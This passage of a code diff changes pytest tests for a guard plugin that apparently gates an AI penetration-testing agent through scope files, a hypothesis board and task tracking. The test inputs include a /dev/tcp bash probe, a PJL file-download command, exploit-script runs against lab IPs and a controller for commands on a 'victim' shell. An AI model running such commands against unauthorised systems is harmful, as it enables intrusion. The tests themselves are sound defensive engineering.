||||
assert "s.close" not in candidates
|
||||
|
||||
|
||||
def test_hypothesis_id_and_target_are_canonicalized_without_false_collisions(tmp_path):
|
||||
path = tmp_path / "hypotheses.md"
|
||||
path.write_text("# Hypothesis Board\n\n### H-H-001: malformed stale entry\n", encoding="utf-8")
|
||||
|
||||
record = hypotheses.update_hypothesis(
|
||||
path,
|
||||
in_scope_hosts={"10.10.15.65"},
|
||||
id="H-001",
|
||||
title="Scoped endpoint test",
|
||||
status="Candidate",
|
||||
phase="EXPLOITATION",
|
||||
target="http://10.10.15.65:4445",
|
||||
cve_research="web_search scoped endpoint CVE; NVD; not applicable",
|
||||
exploit_research="web_search scoped endpoint exploit; GitHub; no results",
|
||||
)
|
||||
|
||||
assert record.id == "001"
|
||||
text = path.read_text(encoding="utf-8")
|
||||
assert "### H-001: Scoped endpoint test" in text
|
||||
assert "H-H-001" not in text
|
||||
|
||||
result = command.check_hypothesis_freshness(
|
||||
tmp_path,
|
||||
command.Phase.EXPLOITATION,
|
||||
"bash -c 'echo test > /dev/tcp/10.10.15.65/4445' > 01-nmap-full.txt",
|
||||
)
|
||||
assert not result.errors, result.errors
|
||||
|
||||
|
||||
def test_hypothesis_refuses_syntax_uncertain_rejection(tmp_path):
|
||||
path = tmp_path / "hypotheses.md"
|
||||
with pytest.raises(ValueError, match="must remain active for re-test"):
|
||||
hypotheses.update_hypothesis(
|
||||
path,
|
||||
in_scope_hosts={"10.10.15.65"},
|
||||
id="001",
|
||||
title="PJL file download",
|
||||
status="Rejected",
|
||||
phase="EXPLOITATION",
|
||||
target="10.10.15.65",
|
||||
test_command='@PJL FSDOWNLOAD NAME="x" SIZE=1',
|
||||
test_response="FILEERROR=1",
|
||||
verification_status="syntax_uncertain",
|
||||
rejection_reason="argument order needs source-verified re-test",
|
||||
)
|
||||
assert not path.exists(), "invalid rejection must not mutate the board"
|
||||
|
||||
|
||||
def test_hypothesis_preserves_verified_rejection_details(tmp_path):
|
||||
path = tmp_path / "hypotheses.md"
|
||||
record = hypotheses.update_hypothesis(
|
||||
path,
|
||||
in_scope_hosts={"10.10.15.65"},
|
||||
id="001",
|
||||
title="PJL file download",
|
||||
status="Rejected",
|
||||
phase="EXPLOITATION",
|
||||
target="10.10.15.65",
|
||||
test_command='@PJL FSDOWNLOAD NAME="x" SIZE=1',
|
||||
test_response="parser branch proves feature disabled",
|
||||
verification_status="not_implemented",
|
||||
rejection_reason="source-verified stub",
|
||||
)
|
||||
|
||||
assert record.verification_status == "not_implemented"
|
||||
text = path.read_text(encoding="utf-8")
|
||||
assert '- **Test Command:** @PJL FSDOWNLOAD NAME="x" SIZE=1' in text
|
||||
assert "- **Verification Status:** not_implemented" in text
|
||||
assert "- **Rejection Reason:** source-verified stub" in text
|
||||
|
||||
|
||||
def test_exploitation_hypothesis_match_accepts_manual_field_order(tmp_path):
|
||||
(tmp_path / "hypotheses.md").write_text(
|
||||
"""### H-001: Queue service validation
|
||||
- **Target:** 10.129.47.140:1515
|
||||
- **Port:** 1515
|
||||
- **Evidence:** evidence/vuln-research/queue.txt
|
||||
- **CVE Research:** web_search queue service 1515 CVE; NVD; no results
|
||||
- **Exploit Research:** web_search queue service 1515 exploit; GitHub; no results
|
||||
- **Status:** Validated
|
||||
- **Phase:** EXPLOITATION
|
||||
""",
|
||||
encoding="utf-8",
|
||||
)
|
||||
|
||||
result = command.check_hypothesis_freshness(
|
||||
tmp_path, command.Phase.EXPLOITATION, "python3 exploit.py 10.129.47.140 1515"
|
||||
)
|
||||
assert not result.errors, result.errors
|
||||
|
||||
|
||||
def test_exploitation_requires_cve_and_exploit_research_attempts(tmp_path):
|
||||
(tmp_path / "hypotheses.md").write_text(
|
||||
"""### H-001: Queue service validation
|
||||
- **Target:** 10.129.47.140:1515
|
||||
- **Status:** Likely
|
||||
- **Phase:** VULN_RESEARCH
|
||||
- **CVE Research:** web_search queue service 1515 CVE; NVD; no results
|
||||
""",
|
||||
encoding="utf-8",
|
||||
)
|
||||
|
||||
blocked = command.check_hypothesis_freshness(
|
||||
tmp_path, command.Phase.EXPLOITATION, "python3 exploit.py 10.129.47.140 1515"
|
||||
)
|
||||
assert any("Exploit Research" in error for error in blocked.errors)
|
||||
|
||||
(tmp_path / "hypotheses.md").write_text(
|
||||
(tmp_path / "hypotheses.md").read_text(encoding="utf-8")
|
||||
+ "- **Exploit Research:** web_search queue service 1515 PoC; GitHub; source unavailable\n",
|
||||
encoding="utf-8",
|
||||
)
|
||||
allowed = command.check_hypothesis_freshness(
|
||||
tmp_path, command.Phase.EXPLOITATION, "python3 exploit.py 10.129.47.140 1515"
|
||||
)
|
||||
assert not allowed.errors, allowed.errors
|
||||
|
||||
|
||||
def test_record_ptt_can_start_pristine_task(tmp_path):
|
||||
skill_file = tmp_path / ".skill-loaded-ts"
|
||||
eng = _init_e2e(tmp_path, skill_file)
|
||||
ptt_path = eng / "state" / "ptt.md"
|
||||
ptt_path.write_text(
|
||||
ptt_path.read_text(encoding="utf-8").replace("| PT-010 | [~] |", "| PT-010 | [ ] |"),
|
||||
encoding="utf-8",
|
||||
)
|
||||
|
||||
result = json.loads(
|
||||
TOOLS.handle_record_ptt(
|
||||
{"eng_dir": str(eng), "id": "PT-010", "status": "[~]", "note": "Start recon"}
|
||||
)
|
||||
)
|
||||
assert result["status"] == "ok", result
|
||||
assert result["task_started"] is True
|
||||
assert ptt.find_active_task(ptt.parse_ptt(ptt_path)).id == "PT-010"
|
||||
|
||||
|
||||
def test_first_command_requires_an_active_ptt_task(tmp_path):
|
||||
"""The guard blocks target work until one PTT task is explicitly active."""
|
||||
skill_file = tmp_path / ".skill-loaded-ts"
|
||||
@@ -324,6 +476,20 @@ def test_exec_blocked_without_skill_load(monkeypatch, tmp_path):
|
||||
assert out["status"] in ("denied", "error")
|
||||
|
||||
|
||||
def test_skill_load_gate_identifies_stale_session_marker(tmp_path):
|
||||
from plugins.violin_guard.core.command import check_skill_load
|
||||
|
||||
state = tmp_path / "state"
|
||||
state.mkdir()
|
||||
(state / ".skill-loaded-old-session").write_text("skill-loaded: test\n", encoding="utf-8")
|
||||
|
||||
gate = check_skill_load(tmp_path, "current-session", mandatory=True)
|
||||
|
||||
assert gate.errors
|
||||
assert ".skill-loaded-old-session" in gate.errors[0]
|
||||
assert str(state / ".skill-loaded-current-session") in gate.errors[0]
|
||||
|
||||
|
||||
def test_init_engagement_creates_compliant_artifacts(tmp_path):
|
||||
"""`init-engagement` auto-creates a bootstrap-complete, guard-clean dir."""
|
||||
import yaml
|
||||
@@ -358,12 +524,24 @@ def test_auto_repair_creates_missing_artifacts(tmp_path):
|
||||
assert int(res) in (0, 2), f"auto-repair should self-heal to clean, got {res}"
|
||||
|
||||
# Artifacts now exist; a real operator still has to confirm authorisation.
|
||||
for rel in ("scope/scope.yaml", "state/ptt.md", "hypotheses.md", "state/history.md"):
|
||||
for rel in (
|
||||
"scope/scope.yaml",
|
||||
"state/ptt.md",
|
||||
"hypotheses.md",
|
||||
"state/history.md",
|
||||
"exploits",
|
||||
"evidence/exploitation",
|
||||
):
|
||||
assert (eng / rel).exists(), f"auto-repair should create {rel}"
|
||||
yaml.safe_load((eng / "scope" / "scope.yaml").read_text(encoding="utf-8"))
|
||||
assert command.validate_scope(eng / "scope" / "scope.yaml").errors
|
||||
|
||||
|
||||
def test_local_tmp_script_path_is_an_informational_reminder():
|
||||
result = command.check_local_artifact_paths("cat > /tmp/exploit.py <<'PY'\nprint('x')\nPY")
|
||||
assert result.infos == ["local script path uses /tmp; save it under $ENG_DIR/exploits instead"]
|
||||
|
||||
|
||||
def test_exec_auto_records_history_but_requires_explicit_ptt_review(monkeypatch, tmp_path):
|
||||
"""History is automatic; PTT freshness cannot be satisfied by execution."""
|
||||
monkeypatch.setenv("HERMES_YOLO_MODE", "1")
|
||||
@@ -397,9 +575,8 @@ def test_exec_auto_records_history_but_requires_explicit_ptt_review(monkeypatch,
|
||||
assert blocked["status"] == "sync_required", blocked
|
||||
assert ptt_path.read_text(encoding="utf-8") == ptt_before
|
||||
|
||||
# The self-certify guard requires the review note to carry the batch_id
|
||||
# returned by the last executed command (proves this review belongs to
|
||||
# this batch). Capture it from the pending-sync state.
|
||||
# The guard captures the batch ID from pending state and appends its marker
|
||||
# to the PTT note; operators need not copy opaque internal IDs.
|
||||
from plugins.violin_guard.core import state as _state
|
||||
|
||||
pending = _state.get_pending_sync(str(eng))
|
||||
@@ -416,11 +593,12 @@ def test_exec_auto_records_history_but_requires_explicit_ptt_review(monkeypatch,
|
||||
"eng_dir": str(eng),
|
||||
"id": "PT-010",
|
||||
"status": "[~]",
|
||||
"note": f"batch reviewed (batch_id {batch_id})",
|
||||
"note": "batch reviewed",
|
||||
}
|
||||
)
|
||||
)
|
||||
assert reviewed["status"] == "ok", reviewed
|
||||
assert f"[reviewed-batch:{batch_id}]" in ptt_path.read_text(encoding="utf-8")
|
||||
synced = json.loads(TOOLS.handle_sync_done({"eng_dir": str(eng)}))
|
||||
assert synced["status"] == "ok", synced
|
||||
resumed = json.loads(TOOLS.handle_exec({**args, "command": "nmap -sV 10.10.10.10 -p 99"}))
|
||||
@@ -440,14 +618,23 @@ def test_exploitation_gets_bounded_window_then_requires_ptt_review(monkeypatch,
|
||||
encoding="utf-8",
|
||||
)
|
||||
# Create a real hypothesis (not in comment) for exploitation phase
|
||||
hypotheses.update_hypothesis(
|
||||
eng / "hypotheses.md",
|
||||
id="001",
|
||||
title="scoped payload validation",
|
||||
status="Candidate",
|
||||
phase="EXPLOITATION",
|
||||
target="10.10.10.10",
|
||||
recorded = json.loads(
|
||||
TOOLS.handle_record_hypothesis(
|
||||
{
|
||||
"eng_dir": str(eng),
|
||||
"id": "001",
|
||||
"title": "scoped payload validation",
|
||||
"status": "Candidate",
|
||||
"phase": "EXPLOITATION",
|
||||
"target": "10.10.10.10",
|
||||
"service": "http",
|
||||
"port": "80",
|
||||
"cve_research": "web_search HTTP endpoint CVE; NVD; not applicable",
|
||||
"exploit_research": "web_search HTTP endpoint exploit; GitHub; no results",
|
||||
}
|
||||
)
|
||||
)
|
||||
assert recorded["status"] == "ok", recorded
|
||||
args = {
|
||||
"eng_dir": str(eng),
|
||||
"scope": str(eng / "scope" / "scope.yaml"),
|
||||
|
||||
@@ -4,7 +4,8 @@ from __future__ import annotations
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
from plugins.violin_guard.core.command import check_scope_targets, validate_scope
|
||||
from plugins.violin_guard.core.command import validate_scope
|
||||
from plugins.violin_guard.core.targets import check_scope_targets
|
||||
|
||||
|
||||
def _write_scope(path: Path, *, confirmed: bool = True) -> None:
|
||||
|
||||
@@ -0,0 +1,49 @@
|
||||
"""Safety contract for the documented PTY shell controller template."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import importlib.util
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
TEMPLATE = Path(__file__).parents[2] / "skills" / "pentest" / "templates" / "shell_ctrl.py"
|
||||
SPEC = importlib.util.spec_from_file_location("violin_shell_ctrl_template", TEMPLATE)
|
||||
assert SPEC and SPEC.loader
|
||||
shell_ctrl = importlib.util.module_from_spec(SPEC)
|
||||
SPEC.loader.exec_module(shell_ctrl)
|
||||
|
||||
|
||||
def test_controller_labels_victim_output_and_parses_exit(monkeypatch):
|
||||
sent: list[str] = []
|
||||
monkeypatch.setattr(shell_ctrl.secrets, "token_hex", lambda _: "fixed")
|
||||
controller = shell_ctrl.PtyShellController(
|
||||
sent.append,
|
||||
lambda marker: f"uid=1000\n{marker}=7\n",
|
||||
)
|
||||
|
||||
exit_code, output = controller.run("id")
|
||||
|
||||
assert exit_code == 7
|
||||
assert output == "[VICTIM] uid=1000"
|
||||
assert sent == ["id; printf '\\n__VIOLIN_DONE_fixed__=%s\\n' \"$?\""]
|
||||
|
||||
|
||||
def test_controller_refuses_long_or_multiline_pty_delivery():
|
||||
controller = shell_ctrl.PtyShellController(lambda _: None, lambda _: "")
|
||||
|
||||
with pytest.raises(ValueError, match="too long"):
|
||||
controller.run("x" * shell_ctrl.MAX_PTY_LINE_BYTES)
|
||||
with pytest.raises(ValueError, match="one command line"):
|
||||
controller.run("id\nuname -a")
|
||||
|
||||
|
||||
def test_sha256_matches_requires_exact_digest(tmp_path):
|
||||
artifact = tmp_path / "payload.py"
|
||||
content = b"print('safe')\n"
|
||||
artifact.write_bytes(content)
|
||||
digest = hashlib.sha256(content).hexdigest()
|
||||
|
||||
assert shell_ctrl.sha256_matches(str(artifact), digest)
|
||||
assert not shell_ctrl.sha256_matches(str(artifact), "0" * 64)
|
||||
Reference in New Issue
Block a user